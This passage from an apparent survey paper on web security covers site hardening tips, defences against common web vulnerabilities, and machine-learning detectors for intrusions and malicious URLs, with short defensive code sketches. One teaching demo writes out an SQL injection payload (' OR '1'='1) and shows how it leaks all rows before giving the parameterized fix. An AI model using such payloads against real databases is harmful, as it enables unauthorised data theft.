This is a bottom-up clustering method in which clusters contain many sub-clusters. It begins with each object in its own cluster and, in each subsequent iteration, agglomerates the closest pair of clusters based on some standard features until all information is collected in one cluster. It can generate an object ordering that is useful for displaying data; the smaller clusters that form along the way may also aid the discovery process.
K-means clustering
This clustering technique divides observations into k clusters, with each observation belonging to the cluster with the closest mean. K-means can be more scalable than hierarchical clustering (i.e., when k is small) when dealing with many variables, and it may generate tighter clusters than hierarchical clustering if the clusters are globular.
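A minimal K-means sketch on synthetic user-behavior features (pages visited, session length) follows, assuming scikit-learn is available; the feature values are invented for illustration.

```python
# K-means groups sessions by behavioral similarity; each new session
# is assigned to the cluster with the nearest mean.
import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(0)
casual = rng.normal([5, 2], 1.0, size=(50, 2))    # few pages, short sessions
heavy = rng.normal([40, 25], 2.0, size=(50, 2))   # many pages, long sessions
X = np.vstack([casual, heavy])

km = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)
print(km.cluster_centers_)     # one center per behavioral group
print(km.predict([[42, 27]]))  # assigns a new session to the nearest cluster
```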
Ways to secure web and avoid vulnerabilities
How to improve the website?
Web applications make things very easy for companies, and any company can quickly create an online presence. Their flexible structure, control units, and continually enhanced versions make it easy to run a website without requiring any training or expertise. This suits business and many other purposes, but there are also drawbacks: many website owners do not know how to secure their websites from cyber-attacks and are unaware of the importance of web security. Here we highlight a few points that all website owners and developers should know to secure their websites from attack [107,111].
Update
Every day, many websites are hacked because of software vulnerabilities and weak security mechanisms, so it is imperative to keep your website up to date. Attackers use advanced, automated systems that continuously scan every website for hacking opportunities; updating once a week or once a month is not adequate, because such systems detect vulnerabilities quickly and accurately, and one of them may find a vulnerability before the user can fix it. The exception is when the user has a website firewall installed, such as CloudProxy, and keeps the software up to date with the latest versions.
Passwords
Working on client sites commonly requires logging in to those sites with their admin user credentials, so the strength of these root passwords is a primary concern. Ubiquitous usernames and weak passwords invite attack; credentials should instead satisfy the following criteria (a generation sketch follows the list):
COMPLEX: A random username and password must be created.
LENGTH: The password must be at least 12 characters long.
UNIQUE: Passwords should not be reused; use a different password for each account.
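A minimal Python sketch satisfying these three rules is given below: a randomly generated, sufficiently long password that stays unique per account because a fresh one is generated each time.

```python
# Generate a random password from letters, digits, and punctuation
# using a cryptographically secure source of randomness.
import secrets
import string

def generate_password(length: int = 16) -> str:
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())   # e.g. 'r#Q7w!pL2@xV9$bK' -- never reuse it
```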
One site = one container
A most important point to understand is that hosting multiple websites on a single server is one of the worst and most dangerous security practices: it exposes all of the sites to greater security threats. We therefore prefer to use one server for only one website, which reduces the attack surface.
Sensible user access
This rule applies to websites with multiple users. Every user should have only the permissions required to complete their tasks. If someone needs temporary access for a specific task, grant it, but terminate the access once the task is completed. This keeps access rights aligned with actual needs.
Change CMS settings
While today's applications are simple to use, their defaults can pose a threat to end-users. Most attacks on websites are automated, using bots or other automated systems, and many are driven by default settings. To avoid most such attacks, change the default settings when installing your preferred software.
Extension selection
Nowadays, extensibility is one of the critical strengths of web applications, yet most people are unaware that this same extensibility is also a main weakness. How do you know which extension to install when several provide similar functionality? Consider the following factors when choosing an extension: check the extension's update history and when it was last updated, and prefer extensions that are kept up to date, since this indicates that any security issue or bug found in them is fixed promptly.
Backups
Every website requires backups, but storing a backup on the production server creates a severe security risk: backups often contain unpatched software versions and, if publicly accessible, give a hacker an easy entry point.
Server configuration files
We should spend some time getting to know the web server configuration files: Apache web servers use the "apache2.conf/httpd.conf" file, the Nginx server uses "nginx.conf", and the Microsoft IIS server uses "web.config". These files, located in the root web directory, are powerful: they let you apply server rules properly and enhance web security. A few guidelines follow:
Avoid directory browsing.
Avoid image hotlinking.
Protect sensitive files.
Install SSL
We explored many articles claiming that installing SSL would solve all security issues. This is utterly wrong: SSL by itself does not protect a website from malicious attacks. What SSL provides is strong encryption between the server and the browser; an important purpose of this encryption is to prevent traffic from being intercepted, so the server and browser can communicate securely. SSL is therefore significant for the security of many websites, especially online buying and selling websites that handle payments and sensitive information.
Avoid vulnerabilities
Protection against injection attack
Many methods are available to identify SQL injection because it is one of the most commonly used attacks [60]. In [110], the researchers proposed a Web Application Firewall (WAF) based on an Artificial Neural Network (ANN) as a method to block the majority of SQL attacks. It operates in two stages: training and working. In the training stage, the system is fed a collection of normal and malicious data to train the ANN; in the working stage, the ANN is integrated into the WAF to identify attacks. The authors of [95] described a semantic comparison-based scheme: syntax trees are built for the query during training and at run time, and the query is considered malicious if the two trees are not equal, and genuine if they are alike. In [46], the researchers introduced another tool, WASP, which is used to prevent SQL attacks. It is based on two concepts: positive tainting and syntax-aware evaluation. Positive tainting identifies and tracks trusted data, rather than untrusted data as in negative tainting, and thus produces false positives rather than false negatives.
Protection against broken authentication and session management
Binding the client's IP address is a standard method of preventing session hijacking: the web server associates a user's session data with a specific IP address and ignores requests for that session from other IP addresses. However, this only works if each user has a unique, static IP address; since most networks use NAT for IP address distribution, which can allocate the same IP address to multiple clients, the technique is less effective in practice [17]. Tracking the user's browser fingerprint is another way of preventing session hijacking: the fingerprint is made up of several characteristics, and any change in it could indicate that an attacker has stolen a session [115]. Macaroons target cloud services by restricting access to the cookie; they use a shared secret and a message chain to create a chain of nested hash-based message authentication codes [31].
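A minimal Python sketch of the fingerprint-binding idea follows; the attribute set (IP address plus User-Agent) is illustrative, and as noted above, IP-based checks are weakened by NAT.

```python
# Store a hash of client attributes at login and invalidate the
# session if they change, which may indicate a hijacked session ID.
import hashlib

def fingerprint(ip: str, user_agent: str) -> str:
    return hashlib.sha256(f"{ip}|{user_agent}".encode()).hexdigest()

session = {"id": "abc123",
           "fp": fingerprint("203.0.113.7", "Mozilla/5.0 ...")}

def validate(session: dict, ip: str, user_agent: str) -> bool:
    return session["fp"] == fingerprint(ip, user_agent)

print(validate(session, "203.0.113.7", "Mozilla/5.0 ..."))  # True
print(validate(session, "198.51.100.9", "curl/8.0"))         # False -- reject
```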
Protection against XSS attacks
Server-side validation of user input is the first defense against XSS. Validation can be carried out using either blacklisting or whitelisting techniques, and malicious user input can be rejected when detected [17]. However, it is difficult to provide complete protection for complex websites using input handling alone. In [171], the researchers suggested a web application proxy method for identifying and restricting XSS attacks: the framework provides a reverse proxy that inspects returned HTML documents and locates vulnerable scripts using a modified web browser.
Protection against insecure direct object references
Access control mechanisms are mainly used to protect resources and internal web application operations. In Role-Based Access Control (RBAC) [37], for example, programmers assign object permissions to roles, and an authorization gives a user access to a specific role during a session; because of separation-of-duty rules, users cannot hold conflicting roles simultaneously. RBAC is used, for example, by the Cisco ACE WAF to define the administration roles of the WAF itself. In [121], the researchers present a secure cookie-based implementation of an access control system with different roles: the user's role data is stored in a pair of secure cookies and sent to the appropriate servers, and Pretty Good Privacy (PGP)-based verification procedures validate these cookies. In [11], the authors proposed an access control method for open web services and applications based on the Extensible Access Control Markup Language (XACML), an access control policy language.
Protection against sensitive data exposure
Data breach: this flaw occurs when the developer leaves weak points in the code; it can only be mitigated by paying close attention to what is left in the code and handling errors safely. Database theft: cryptography, combined with a good database access security policy, is a critical defense against this attack; in [33], the researchers suggested database-driven security protocols to protect against it.
Protection against CSRF
Several server-side security measures are available to mitigate CSRF attacks [2,33]. In [66], the researchers present NoForge, a backend proxy that can be integrated into a system to detect and prevent CSRF attacks while remaining invisible to the running applications; the primary function of the proxy is to detect attacks and protect PHP applications from CSRF. The characteristics of server-side safety measures for user protection have also been discussed, and a server-side plug-in was created to protect users from these attacks [181].
Protection against unvalidated redirects and forwards
The authors of [139] classified phishing defenses into the following types: blacklist-based, visual similarity-based, machine learning-based, and heuristic-based. Blacklist-based techniques build a regularly updated repository of known phishing URLs. The most remarkable work in this category is the Google Safe Browsing API, along with PhishNet [127], which identifies malicious URLs based on previously identified ones, and the Automated Individual White List (AIWL) [21], which maintains a record of secure Login User Interfaces (LUIs); unfortunately, this record suffers from unreliable LUI predictions. In general, blacklist-based techniques have high True-Positive (TP) rates and low False-Positive (FP) rates [18,130].
Machine learning and deep learning for web security
Machine learning algorithms
Machine learning (ML) offers an alternate method for discovering vulnerabilities, and it is possibly quicker for finding vulnerability [29,39]. The ML algorithms could learn abstract and latent risky coding structures, possibly improving overall generalization. ML algorithms currently in use are mainly operable with source code, which is more human-readable. Imports (e.g., header files), software complexity metrics, function calls [114], and coding changes; researchers have used all of these as indicators for discovering possibly code snippets or vulnerable files [147,148]. Additionally, Version control systems include functionalities and information gathered, such as development activities [104] and code pushed [125], which were used to predict vulnerabilities. To address the limitations of the available methods, because many malware variants usually share the same behavior patterns [113], anti-malware organizations decided to create more advanced methods based on data mining and ML techniques [151]. These techniques utilize various forms of feature extraction (i.e., data representation) to create intelligent malware tracking systems. They often use an SVM-based classifier [133], a Naive Bayes classifier [68], or a combination of classifiers (nave Bayes, decision trees, and SVM) [74]. Recently, there is a lot of different ML techniques are used to identify malicious URLs. In [92], researchers identify malicious URL attributes using Statistical methodology, derive a few more features for ML, and compare different models with this classified model. Based on heuristic and feature-based methods, they proposed an approved semi-supervised method for training the URL, known as the multi-classification model [176]. This method achieves more accurate classification results. The classification of the state-of-the-art ML algorithms is shown in Fig. 10.

Classification of machine learning algorithms.
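To make the feature-based URL detection discussed above concrete, the following minimal sketch extracts simple lexical features and trains a logistic-regression classifier; the URLs and labels are synthetic, and scikit-learn is assumed to be available. It is an illustrative instance of the approach, not the cited systems themselves.

```python
# Simple lexical URL features feed a linear classifier that separates
# benign from malicious URLs.
import numpy as np
from sklearn.linear_model import LogisticRegression

def features(url: str) -> list:
    return [len(url),                   # malicious URLs tend to be long
            url.count("."),             # many subdomains are suspicious
            url.count("-"),
            int("@" in url),            # '@' can hide the real host
            int(url.startswith("https"))]

urls = ["https://example.com/login",
        "http://secure-pay.example-update.biz/@a",
        "https://shop.example.com",
        "http://x1-verify.account-check.info/a.b.c"]
labels = [0, 1, 0, 1]                   # 0 = benign, 1 = malicious (synthetic)

clf = LogisticRegression().fit(np.array([features(u) for u in urls]), labels)
print(clf.predict([features("http://update-login.example-bank.xyz/@pay")]))
```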
Entropy clustering and other technologies have been utilized to predict and effectively detect DDoS attacks, moving systems from passive to active defense [117]. Jason used a variety of network detection technologies and proposed a single-factor evaluation framework [145]. Xiaoling et al. proposed a hierarchical multi-domain network security situational awareness method based on a graph database, which establishes a hierarchical model and divides the network into different domains, allowing awareness data to be collected and processed more effectively [158]. With the advance of cloud computing, other authors integrated game theory into network security situational awareness and measured the network situation value through game-theoretic utility [182]. Xiaowu et al. proposed a network security model based on NSSA to break through the communication barriers between different networks [88]. Z. Ying et al. integrated the advantages of rough set theory and ML in data processing and feature selection into situation assessment, proposed a new network assessment model, and verified its feasibility and effectiveness through experiments [188]. Experts proposed a network security prediction model based on adaptive evolutionary strategy optimization of a covariance matrix (CMA-ES), optimized the hyperparameters of an SVM through CMA-ES, and preprocessed the accumulated data to strengthen the model's predictive ability [64]. Jinsoo et al. used a Bayesian network to measure network security situational awareness and established the corresponding network security model [146]. Rajesh et al. proposed a security situational awareness system based on attack measurement [120]. A situation element extraction model was designed based on projection pursuit, using Particle Swarm Optimization (PSO) to optimize the projection index; experimental results show that the model has advantages in accuracy and convergence speed [168]. A situation element extraction mechanism was also developed based on Logistic Regression (LR) and an improved particle swarm optimization model; experimental results show that the element extraction model constructed by this mechanism has stronger generalization ability [79].
Much research effort has been put into improving the automated vulnerability detection process. However, human intelligence still plays a vital role in providing information and developing the methods used to detect vulnerabilities [164]. Many tools, whether static or automated detection tools, have been developed based on expert experience to mirror how security experts approach vulnerability detection. For example, static code analysis tools are based on extracted rule templates developed from best software design practices: if any predefined rule is broken, the system raises an alert. In addition, selected features are obtained from code analysis artifacts such as the Abstract Syntax Tree (AST) and Control Flow Graph (CFG); ML-based detection methods depend significantly on such carefully engineered feature sets extracted from code analysis (e.g., CFGs).
Deep learning (DL) algorithms are based on Deep Neural Networks (DNNs): large neural networks organized in many layers that are proficient at automated feature representation. Traditional ML algorithms require features to be identified from human experience and deep domain knowledge, a process that can be time-consuming and error-prone [81,170]. DL techniques are proliferating within ML for finding vulnerabilities. On the one hand, the layered structure of neural-network/DL models facilitates learning conceptual and highly nonlinear structures, capturing the intrinsic structure of complex data. On the other hand, neural networks allow automatic extraction of features from different layers, possibly with a higher level of generalization [84], removing the expert from the time-consuming and potentially error-prone process of feature engineering. Furthermore, DL algorithms can detect distinctive information that a human expert might never notice [140]. As a result, the search space has grown, and researchers are motivated to use neural networks to learn vulnerable code patterns suggestive of application weaknesses. DNNs used to identify vulnerabilities can capture and represent code concepts. DL algorithms go a step further than traditional ML approaches based solely on feature extraction toward closing this gap, by learning deep structures and high-level representations of web application code that expose code concepts [7]. Supervised learning performs classification and regression for several web security tasks [105,108]; unsupervised learning handles associative rule mining and clustering problems [51,53,56,58,59,61–63]; and reinforcement learning handles exploration and exploitation problems [27]. Several unsupervised algorithms have shown astonishing performance, such as Generative Adversarial Networks (GAN) [40], Auto Encoders (AE) [50,100], Recurrent Neural Networks (RNN) [14], Boltzmann Machines (BM) [135], Deep Belief Networks (DBN) [15], and variants of these state-of-the-art models. Hybrid DL algorithms have also shown their importance in web security [57,70,89,101,108,160]. The classification of state-of-the-art DL algorithms is shown in Fig. 11. CNN algorithms for text have also been adopted in network security. As a special language parsed by the server, a URL is similar to traditional text in composition, structure, and characteristics: it is data with semantic relations, so it is natural to treat a URL as natural language in feature representation. The TextCNN model has therefore been applied to web threat classification and detection scenarios [178].

Fig. 11. Classification of deep learning algorithms.
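As an illustration of the TextCNN idea for URL classification, the following minimal PyTorch sketch embeds characters and applies parallel convolutions with max-pooling; vocabulary size, kernel widths, and all other hyperparameters are our assumptions, not those of [178].

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class TextCNN(nn.Module):
    """Character-level TextCNN for URL classification (illustrative sizes)."""
    def __init__(self, vocab_size=128, embed_dim=32, n_filters=64,
                 kernel_sizes=(3, 4, 5), n_classes=2):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
        self.convs = nn.ModuleList(
            nn.Conv1d(embed_dim, n_filters, k) for k in kernel_sizes)
        self.fc = nn.Linear(n_filters * len(kernel_sizes), n_classes)

    def forward(self, x):                           # x: (batch, seq_len) char ids
        e = self.embed(x).transpose(1, 2)           # (batch, embed_dim, seq_len)
        # Parallel convolutions followed by global max-pooling over time.
        pooled = [F.relu(c(e)).max(dim=2).values for c in self.convs]
        return self.fc(torch.cat(pooled, dim=1))    # (batch, n_classes)

# Toy usage: URLs encoded as ASCII codes and padded to a fixed length.
model = TextCNN()
batch = torch.randint(1, 128, (8, 60))  # 8 fake URLs, 60 characters each
logits = model(batch)                   # shape (8, 2)
```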
The RNN model is designed for processing sequential input (e.g., text), unlike feed-forward networks such as FCNs or CNNs. It is called a recurrent (cyclic) neural network because the current output of a sequence depends on the previous outputs. Specifically, the input to an RNN is processed as a time-ordered sequence. The key feature of the RNN is memory, which allows it to remember input values from earlier time steps. In web security detection, the data characteristics of a URL can be transformed, after normalization, into vector sequences with temporal order; using the memory of the RNN to extract features can achieve better detection results. As a result, many studies have used RNN variants to obtain a conceptual understanding of security breaches. The bidirectional form of RNNs is proficient at capturing a sequence's dependencies. However, in complex cases it is difficult to obtain relevant results by analyzing only the recent time-series data, and longer memory is required to trace the source; Long Short-Term Memory (LSTM) can therefore analyze time-series data over a longer range. As a result, many researchers have used bidirectional LSTM (Bi-LSTM) [52] and Gated Recurrent Unit (GRU) [25] structures to learn contextual code dependencies, which are essential for understanding several types of threats (e.g., buffer-overrun vulnerabilities) whose vulnerable contexts span multiple code lines, either consecutive or intermittent. DL has been used to detect attacks in recent years, outperforming typical detection methods. In [14], the researchers investigated many URL identification models and found that neural networks require no manual features and that their detection results are much better than other approaches such as URL embedding [138,184,186].
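The Bi-LSTM structures cited above can be sketched as follows; this is a minimal illustrative PyTorch model, not the architecture of any cited work. The vocabulary size, hidden width, and the use of the final time step as a sequence summary are our simplifying assumptions.

```python
import torch
import torch.nn as nn

class BiLSTMClassifier(nn.Module):
    """Bidirectional LSTM over token/character sequences (illustrative sizes)."""
    def __init__(self, vocab_size=128, embed_dim=32, hidden=64, n_classes=2):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
        self.lstm = nn.LSTM(embed_dim, hidden, batch_first=True,
                            bidirectional=True)
        self.fc = nn.Linear(2 * hidden, n_classes)  # forward + backward states

    def forward(self, x):                       # x: (batch, seq_len)
        out, _ = self.lstm(self.embed(x))       # (batch, seq_len, 2*hidden)
        # Simplification: use the last time step as a summary of the sequence.
        return self.fc(out[:, -1, :])

model = BiLSTMClassifier()
logits = model(torch.randint(1, 128, (4, 80)))  # 4 fake sequences of length 80
```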
A security feature extraction model based on an improved discrete wolf pack algorithm (IDWPA) was applied to large-scale data and changeable intrusion behaviors in the cloud computing environment, minimizing the redundancy of extracted features and the complexity of the problem [131]. Experimental simulation shows that the algorithm significantly improves data feature extraction and classification accuracy. Tian et al. used a Deep Belief Network (DBN) to extract network intrusion features, effectively improving the ability to resist Internet attacks [159]. Preethi et al. proposed a DL model based on a Sparse Autoencoder (SAE) [129]; the new feature representation can be reconstructed effectively to reduce the error rate of intrusion prediction and improve the prediction rate. In [175], the authors proposed a situation assessment method based on adversarial DL and directly established an autoencoder deep neural network model (AEDNN) based on a DAE and a DNN.
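The sparse-autoencoder approach of [129] can be sketched roughly as follows; the architecture, the 41-feature input (reminiscent of KDD-style traffic records), and the L1 sparsity penalty weight are our illustrative assumptions, not the cited work's exact formulation.

```python
import torch
import torch.nn as nn

class SparseAE(nn.Module):
    """Illustrative sparse autoencoder for intrusion-feature learning."""
    def __init__(self, n_features=41, n_hidden=16):
        super().__init__()
        self.encoder = nn.Sequential(nn.Linear(n_features, n_hidden), nn.ReLU())
        self.decoder = nn.Linear(n_hidden, n_features)

    def forward(self, x):
        z = self.encoder(x)          # compact latent feature representation
        return self.decoder(z), z    # reconstruction + latent code

model = SparseAE()
opt = torch.optim.Adam(model.parameters(), lr=1e-3)
x = torch.rand(32, 41)               # fake normalized traffic records
recon, z = model(x)
# Reconstruction loss plus an L1 penalty that encourages sparse activations.
loss = nn.functional.mse_loss(recon, x) + 1e-3 * z.abs().mean()
loss.backward()
opt.step()
```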
For the advancement of network security intrusion detection, the authors used DL methods to detect intrusion data more comprehensively and surveyed the latest work on network anomaly detection using DL [12,124]. One study proposed an intrusion detection model based on a Decision Tree (DT) algorithm fusing a DBN with extreme gradient boosting, which provides a new method for processing unbalanced data and improving detection performance against rare attacks [136]. Furthermore, a Wi-Fi network intrusion detection model based on a DBN was proposed, which improves the accuracy of intrusion detection and exhibits better overall performance [165]. Liang et al. proposed a combined intrusion detection method based on a convolutional neural network and an extreme learning machine, which effectively improves the accuracy of intrusion detection and has good generalization ability and real-time performance [82]. Similarly, an intrusion detection method based on a Deep Convolutional Neural Network (DCNN) was proposed and shown experimentally to reduce training time and the false positive rate while improving detection accuracy and the real-time processing performance of the intrusion detection system [149]. Zhang et al. proposed an improved LeNet-5 and LSTM neural network structure for network intrusion detection [185]. An anomaly detection method based on improved CNN and LSTM neural networks was developed, effectively improving the detection rate and reducing the false alarm rate of network traffic detection [187].
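The combined CNN and recurrent detectors cited above motivate a hybrid of the following shape; this is an illustrative skeleton, not the architecture of [82], [149], or [187], and all layer sizes are placeholders.

```python
import torch
import torch.nn as nn

class CNNLSTM(nn.Module):
    """Illustrative CNN+LSTM hybrid for traffic anomaly detection."""
    def __init__(self, n_features=41, n_classes=2):
        super().__init__()
        # Convolution extracts local patterns across adjacent features.
        self.conv = nn.Sequential(
            nn.Conv1d(1, 16, kernel_size=3, padding=1), nn.ReLU(),
            nn.MaxPool1d(2))
        # LSTM models longer-range dependencies over the conv feature map.
        self.lstm = nn.LSTM(16, 32, batch_first=True)
        self.fc = nn.Linear(32, n_classes)

    def forward(self, x):                 # x: (batch, n_features)
        h = self.conv(x.unsqueeze(1))     # (batch, 16, n_features // 2)
        out, _ = self.lstm(h.transpose(1, 2))
        return self.fc(out[:, -1, :])     # classify from the last step

logits = CNNLSTM()(torch.rand(8, 41))     # 8 fake normalized records
```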
The fundamental problems in applying DL techniques to network security include algorithm performance issues such as interpretability, traceability, adaptability, and self-learning. The false positive rate and the handling of unbalanced datasets also need improvement [4,172] (a short sketch of one common mitigation, class-weighted training, follows the research directions below). The latest research results of DL technology centered on network anomaly detection should be investigated further, including the Deep Belief Network (DBN), Deep Neural Network (DNN), Recurrent Neural Network (RNN), and related ML techniques. The application of DL algorithms at different network layers should also be introduced and discussed to enhance other network functions, such as network security, data sensing, and compression [77,97]. In view of the current state and its problems and deficiencies, in-depth research on the following aspects is necessary in the future:
(1) Feature engineering. The definition, extraction, analysis, and automation of network security features are the premise for the further development of network security. Since many methods involve feature engineering, combinations of feature extraction and feature selection tailored to different data types can improve the efficiency and effectiveness of processing large volumes of security data; continuing to study the application of DL in network security remains valuable and has a broad future.

(2) Continuously updated detection models. Most security defense mechanisms in the network security industry still rely on traditional rule matching to generate alarms, yet attackers have made rapid progress in tools and code, and attack techniques keep evolving with the network and technology. A detection method that is adopted permanently not only depends on the experience of security experts but also suffers a severe time lag; many of the alarms raised today appear outdated, which causes losses to enterprises, and more serious security incidents can even affect the national economy and people's livelihood. Only a continuously updated detection model can truly confront the increasingly complex network environment and better protect IT infrastructure and the rights and interests of Internet users.

(3) Standardized measurement indicators. The amalgamation and standardization of network security measurement indicators need to advance. Such indicators have not yet reached consensus, mainly because they differ across application scenarios; moreover, indicators of network security protection ability are complex and difficult to describe, which obstructs research on security assessment and prediction. Establishing a unified, standardized indicator system would allow network security to be depicted objectively, comprehensively, and accurately, and would ease the comparison and integration of evaluation and prediction models.

(4) Scalable situation assessment. Situation assessment should be oriented to large-scale network security data, focusing on the efficiency of element extraction; parallelization can be added to improve evaluation efficiency.

(5) Verified user-behavior evaluation. User behavior detection and evaluation methods should be verified on public datasets, and evaluation indices should be established to validate the algorithms on user behavior data in real-time network environments.

(6) Dynamic, adaptive prediction. The network structure is complex and the perceived security data are ever-changing, so prediction efficiency and accuracy in dynamic environments should be improved. In different application scenarios, unknown new features may appear and the security situation may deviate from the expected trend; the prediction model should therefore be adjusted dynamically or combined with more intelligent DL methods, which can become a focus of further research.

(7) More automated, intelligent awareness models. The network security awareness model needs higher automation and intelligence, and network security risk assessment should be studied further to improve the model's active defense. The model must also be verified in different simulation and real-time environments.
Therefore, further extending these models will have unique application value and practical significance.
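Returning to the unbalanced-dataset problem raised above, one concrete mitigation is class-weighted training, sketched below; the label distribution and weighting scheme are illustrative, not taken from the cited works.

```python
import numpy as np
import torch
import torch.nn as nn
from sklearn.utils.class_weight import compute_class_weight

# Fake, heavily imbalanced labels: 950 benign records vs. 50 rare attacks.
y_train = np.array([0] * 950 + [1] * 50)
weights = compute_class_weight("balanced", classes=np.array([0, 1]), y=y_train)
criterion = nn.CrossEntropyLoss(
    weight=torch.tensor(weights, dtype=torch.float))
# This loss now penalizes errors on the rare attack class roughly 19x more,
# pushing the classifier not to ignore rare attacks during training.
```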
Discussion and limitations
Nowadays, web applications are dominant because of their regular use in many sectors, and attacks on them are on the rise due to this rising demand. In this paper, we highlight the critical features necessary for web security and discuss the top 10 web application vulnerabilities that may lead to massive damage. According to most studies, SQL injection and XSS are the most common attacks, and both are used widely on different platforms. SQL injection is a remote execution technique that allows attackers to obtain critical data from a web server's database. XSS attacks are likewise considered a major security threat to web applications; typically, XSS is caused by improper validation of user inputs, and such attacks allow malicious scripts to run in the browser to steal cookies, hijack the session, etc. The Pikachu platform is an open-source, accessible platform for building web vulnerability exercises. Compared with DVWA, the Pikachu platform takes the latest OWASP Top 10 as its core and constantly updates its vulnerability modules. It now includes common SQL injection, code injection, XML external entity injection, sensitive information disclosure, XSS (cross-site scripting), file inclusion, file upload, PHP deserialization, and other web vulnerability scenarios. Each vulnerability type in the Pikachu platform is further divided into subclasses for different situations: SQL injection, for instance, is divided into numeric injection, character injection, search injection, and HTTP header injection, with significant variants based on Boolean, time-based, and wide-byte injection. In addition, the code structure of the Pikachu platform is clear and the content easy to read; after the virtual machine is built, students can modify the platform's source code according to the needs of the experiment, for example adding filter functions to increase the difficulty.
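To make the SQL injection discussion concrete, the sketch below contrasts a vulnerable string-built query with a parameterized one using Python's standard sqlite3 module; the table, data, and payload are illustrative only.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # classic injection payload

# VULNERABLE: attacker-controlled input is concatenated into the query,
# turning the WHERE clause into a tautology that returns every row.
query = f"SELECT * FROM users WHERE name = '{user_input}'"
print(conn.execute(query).fetchall())   # leaks all rows

# SAFE: a parameterized query treats the input as data, not SQL.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_input,))
print(rows.fetchall())                  # returns nothing
```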
Furthermore, we discuss how to protect users from these top vulnerabilities and evaluate different protection techniques. SQL injection is the primary attack, and several solutions have been proposed to mitigate it, based on grammar, machine learning, entropy, and tainting. The grammar-based technique is very effective but time-consuming and error-prone, because a model must be created for each request. These approaches are also unsuitable for detecting stored-procedure attacks and subqueries in the DBMS. Sometimes the web page's computational complexity and loading time influence the website's security, making it vulnerable to attackers. These issues have been considered many times, and evolving strategies continue to improve e-business [38,49,153].
Pros and cons of different network security models
Network technology is gradually progressing: more and more types of network attacks are emerging, the scale of attacks is growing, and the way attacks are carried out has changed. Current network attacks are gradually becoming more sophisticated, and each attack step provides information for the next. For example, suppose one wants to attack a system host: the attacker will first scan the ports to find a host or port that may have vulnerabilities, and then exploit those vulnerabilities until the host is compromised. Correlation analysis models are divided into several types with different forms of expression and effects. Furthermore, several well-known network security mechanisms have been developed in the last decades, such as Zero Trust, Network Segmentation, Hyperscale, Intrusion Prevention Systems, Email Security, and Remote Access. The significant pros and cons of some of these methods are given in Table 1.
Additionally, it is not viable to detect such attacks in real time because of their high time complexity. Some common examples of web security limitations are shown in Fig. 12. Entropy approaches are currently unstable because they are based on probabilistic models. Taint-based approaches take time because they must track every attribute on the website. ML techniques can also be unsuitable here because they require a lengthy training period and can produce many false positives and false negatives. The second serious flaw concerns authentication and session management. To combat potential session vulnerabilities, a user's level of access control can be changed and the value of the validated cookie can be updated. Website developers can keep improving the authentication system by using time-signature or photo-based verification methods. The common protection against session attacks is to restrict JavaScript's access to session cookies. Identifying a list of security initiatives is another good proposal. Numerous defensive solutions are used to counter XSS attacks, and existing mitigation strategies depend primarily on user-input sanitization. Some methods use the probability distribution of tokens to process web pages; others rely on modifying the page code, either by creating a shadow site, inserting a script ID, or injecting boundaries [18,130]. The misuse of web objects and functions can be prevented by controlling and managing roles and requiring permission to handle them. The web developer must ensure proper website configuration during implementation and testing. As a result, the attacker's knowledge of a component's default values is reduced while its security is enhanced. A manual scan of the server is especially beneficial at this stage.

Fig. 12. Examples of web security limitations.
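Restricting JavaScript's access to session cookies, as recommended above, is typically achieved with the HttpOnly flag (together with Secure and SameSite). Below is a minimal sketch assuming the Flask framework; the route name and cookie values are hypothetical.

```python
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/login")
def login():
    resp = make_response("logged in")
    # HttpOnly hides the cookie from document.cookie (mitigates XSS theft);
    # Secure restricts it to HTTPS; SameSite curbs cross-site requests.
    resp.set_cookie("session_id", "abc123", httponly=True,
                    secure=True, samesite="Lax")
    return resp
```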
Regarding the sixth flaw, when personal information is exchanged between the user and the client, the web server must use a secure connection. Administrators must adopt robust data-to-server policies and strong encryption for the user's personal information stored in the database. A Captcha is one of the best ways to avoid CSRF attacks, i.e., the eighth flaw; to prevent it from being bypassed, strong models are needed. Many other works have been proposed to deal with this type of threat, in which the client side is hardened with additional procedures and a few scripts are added to the web server. For the ninth vulnerability, the developer should take extra precautions when working with external components on a website, particularly open-source frameworks and libraries, because they can weaken the website; developers can reduce the risk by rebuilding their interfaces to these components. The last category in the list of top vulnerabilities is phishing, which can be countered by detecting fake URLs.
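Alongside Captcha, a widely used CSRF defense is a per-session synchronizer token. The sketch below, using only Python's standard library, shows the idea; all names and the key-handling scheme are illustrative, not drawn from the cited works.

```python
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)  # server-side secret (illustrative)

def issue_csrf_token(session_id: str) -> str:
    """Bind a token to the session so an attacker cannot forge it."""
    return hmac.new(SECRET_KEY, session_id.encode(), "sha256").hexdigest()

def verify_csrf_token(session_id: str, token: str) -> bool:
    expected = issue_csrf_token(session_id)
    # Constant-time comparison avoids timing side channels.
    return hmac.compare_digest(expected, token)

tok = issue_csrf_token("session-abc123")
assert verify_csrf_token("session-abc123", tok)
assert not verify_csrf_token("session-evil", tok)
```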
Web security and vulnerabilities are vital factors, especially in an environment where everything is handled online. This paper has pointed out the challenges of web security. We first discussed the essential features of web security, such as attack types, attack impacts, comparison of different tools, security threats, and their importance for E-commerce security. We then described several ways to secure the web and avoid vulnerabilities, and covered a wide range of privacy and security concerns related to web applications and E-commerce; privacy and security are vital issues that must be addressed to design a trustworthy and reliable environment. Lastly, we described the role of ML and DL in web security. This paper should assist future web security endeavors and emerging secure e-business.
At present, the boom in machine learning has swept the world, and more and more algorithms and models have been applied to different fields, including web security. In intrusion detection, several classifiers do not show ideal performance and exhibit problems such as weak generalization ability and low classification accuracy. These problems stem from factors that can be considered in future work, such as the setting of model parameters, limited training samples, excessive noise in the training data, and so on.
Acknowledgements
This paper and the research behind it would not have been possible without the exceptional support of all coauthors.
Conflict of interest
The authors have no conflicts of interest to declare.
Ethical approval and consent to participate
All participants provided ethical approval and informed consent to participate in the study.
